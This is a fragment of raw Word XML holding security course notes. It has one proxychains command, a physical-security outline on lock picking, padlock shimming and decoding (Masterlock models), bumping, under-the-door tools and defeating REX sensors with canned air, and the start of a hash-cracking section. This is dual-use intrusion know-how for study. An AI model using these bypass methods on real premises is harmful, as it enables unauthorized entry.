          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="150B2B51" w14:textId="61A61593" w:rsidR="00E90231" w:rsidRPr="0084205E" w:rsidRDefault="00E90231" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C90551" w14:textId="2EFD3ED2" w:rsidR="00E90231" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Physical Security Intro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445FC6F8" w14:textId="3E01727D" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="00E85BCF" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/rnmcRTnTNC8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26DCDC2D" w14:textId="174F3595" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidR="00E85BCF" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/sw94smSiJBY</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4006A10E" w14:textId="5BF69A84" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Overt, Covert, and Surreptitious Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E928F73" w14:textId="637E160F" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Overt – entry causes damage/destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772136AE" w14:textId="5EEBCA88" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Covert – undetectable to untrained people, detectable during forensics or trained professionals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5A305" w14:textId="3520FD72" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Surreptitious – undetectable to both un-trained and trained people, unnoticed during forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA7D242" w14:textId="3131E34D" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lock Picking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9C0F6" w14:textId="52C7320C" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>tension wrench</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED7CB2E" w14:textId="6A6A2301" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00E85BCF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>single pin picking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CDC212" w14:textId="47800C6D" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>hook pick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16697BC8" w14:textId="05CFFB02" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>false set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71860BA2" w14:textId="21B606D4" w:rsidR="00E85BCF" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Raking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30A72A" w14:textId="16DD217E" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wafer Lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5AA73B" w14:textId="2A13F555" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Serrated security drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB77579" w14:textId="61F7397C" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lock Anatomy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64653E42" w14:textId="48027BD6" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>shear line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255AC44" w14:textId="4AD0006D" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD2ADE" w14:textId="589F2760" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB67FC3" w14:textId="301928FE" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ball bearings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504653D7" w14:textId="0F6594D9" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>actuator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470C091F" w14:textId="17A90C3D" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dead latch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B474C83" w14:textId="25E2488D" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dead bolt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505FD85" w14:textId="64EB0117" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Padlock Bypassing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2695BDBA" w14:textId="0518D874" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Knife</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25349171" w14:textId="32C66C82" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D848F" w14:textId="11F5BC42" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Decoding – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Masterlock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 5400D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A06D90" w14:textId="1B43F4FD" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Mini Knife – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Masterlock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 175</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A4C8E" w14:textId="45362BA3" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34ECB9" w14:textId="7161AD0C" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B389022" w14:textId="56A51371" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Comb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7CA0B" w14:textId="4177308D" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Jiggler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="148E67D8" w14:textId="15411ECA" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hardware Bypassing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46D5A4" w14:textId="08045304" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>under the door tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F16731" w14:textId="1B12B411" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>double door tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792AE71" w14:textId="5C53BD23" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>shim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BC9CD" w14:textId="2036A8BE" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>canned air defeats REX sensor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4352C" w14:textId="2CCBBFF8" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>film can be used to go over the door to grab the secure side handles when an under the door tool is not able to be used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F905806" w14:textId="47DB2A90" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00A35F3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFCB878" w14:textId="13311466" w:rsidR="00A35F3D" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="00A520E8" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://toool.us/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E2DF4A8" w14:textId="635E12AC" w:rsidR="00A520E8" w:rsidRPr="0084205E" w:rsidRDefault="00A520E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603C1126" w14:textId="22E408D5" w:rsidR="00A520E8" w:rsidRPr="0084205E" w:rsidRDefault="00A520E8" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crack the Hash Level Two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133A308" w14:textId="347F94F1" w:rsidR="00A520E8" w:rsidRPr="0084205E" w:rsidRDefault="00A520E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hash Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81A5E3" w14:textId="1F787F3E" w:rsidR="00A520E8" w:rsidRPr="0084205E" w:rsidRDefault="00A520E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Haiti CLI tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB629D7" w14:textId="05885C27" w:rsidR="00A520E8" w:rsidRPr="0084205E" w:rsidRDefault="00A520E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hash-Identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43FCD0" w14:textId="2B0DAAD2" w:rsidR="00A520E8" w:rsidRPr="0084205E" w:rsidRDefault="00A520E8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
